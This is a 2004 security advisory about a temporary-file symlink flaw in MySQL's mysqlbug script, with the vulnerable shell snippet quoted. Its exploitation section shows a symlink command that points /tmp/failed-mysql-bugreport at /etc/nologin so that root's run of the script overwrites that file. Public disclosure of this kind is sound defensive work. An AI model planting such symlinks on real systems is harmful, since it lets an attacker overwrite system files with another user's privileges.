mysqlbug tmpfile/symlink vulnerability.
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
Product: mysqlbug packaged with MySQL.
Versions: All
Bug: Symlink bug / tmpfile bug.
Impact: Attacker's can overwrite arbitrary
files.
Risk: Low/Medium
Date: March 24, 2004
Author: Shaun Colley
Email: shaunige yahoo co uk
WWW: http://www.nettwerked.co.uk
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
Introduction
#############
MySQL is an open-source, fast and popular SQL
database, in widespread use across the Internet. As
with many other popular products, a bug report script
is packaged with MySQL, named mysqlbug. This script
is vulnerable to a tmpfile/symlink bug.
Details
########
When mysqlbug is ran, a text editor is launched, and
the user is prompted to write their bug report using a
template to guide them.
The issue presents itself in how the script handles a
user simply exiting the text editor without changing
the bug report. When this happens, the mysqlbug
script does the following:
--
if cmp -s $TEMP $TEMP.x
then
echo "File not changed, no bug report submitted."
cp $TEMP /tmp/failed-mysql-bugreport
echo "The raw bug report exists in
/tmp/failed-mysql-bugreport"
echo "If you use this remember that the first lines
of the report now
is a lie
.."
exit 1
fi
--
As can be seen, a tmpfile isn't attempted to be
created
securely, just a quick 'cp' to an unchecked file
(/tmp/failed-mysql-bugreport), potentially allowing an
attacker to overwrite arbitrary files if a symlink
already exists with this name
(/tmp/failed-mysql-bugreport).
This could be bad if a root user had invoked mysqlbug,
and then decided that they wanted to gather more info
on their potential bug, so exited the text editor (and
meanwhile the attacker had symlinked
/tmp/failed-mysql-bugreport to /etc/nologin or
otherwise).
Successful exploitation of the symlink bug would allow
an attacker to overwrite arbitrary files with the
privileges of the user invoking 'mysqlbug'.
It should be noted that this vulnerability can ONLY be
exploited if the user exits the text editor invoked by
mysqlbug before editing the content.
Exploitation
#############
All that is required to exploit the issue is to create
a symlink from /tmp/failed-mysql-bugreport to an
arbitrary file. An example attack is presented below:
--
attacker$ ls -al /nologin
ls: /etc/nologin: No such file or directory
attacker$ ln -s /etc/nologin
/tmp/failed-mysql-bugreport
[...]
root# mysqlbug
[root decides to exit the text editor that mysqlbug
started, because he
wants to get more info on his discovered bug]
attacker$ ls -al /nologin
-rw-r--r-- 1 root root 0 Mar 24
16:50 /etc/nologin
---
Solution
#########
The bug has been fixed, and the patched mysqlbug
script has been committed into the MySQL source
repository. The latest available version, including
the bugfix can be built -
<http://www.mysql.com/doc/en/Installing_source_tree.html>
The fixed script will also be incorporated into the
next full release of MySQL, if you do not wish to
access the source repository immediately for a
less-critical security issue.
Credit
#######
Issue discovered by Shaun Colley / shaun2k2 -
<shaunige yahoo co uk>.
Thanks to the MySQL team for responding and fixing the
bug within 2 hours, despite the bug being a
non-critial issue and other things taking priority.
Thank you for your time.
Shaun.
___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping"
your friends today! Download Messenger Now
http://uk.messenger.yahoo.com/download/index.html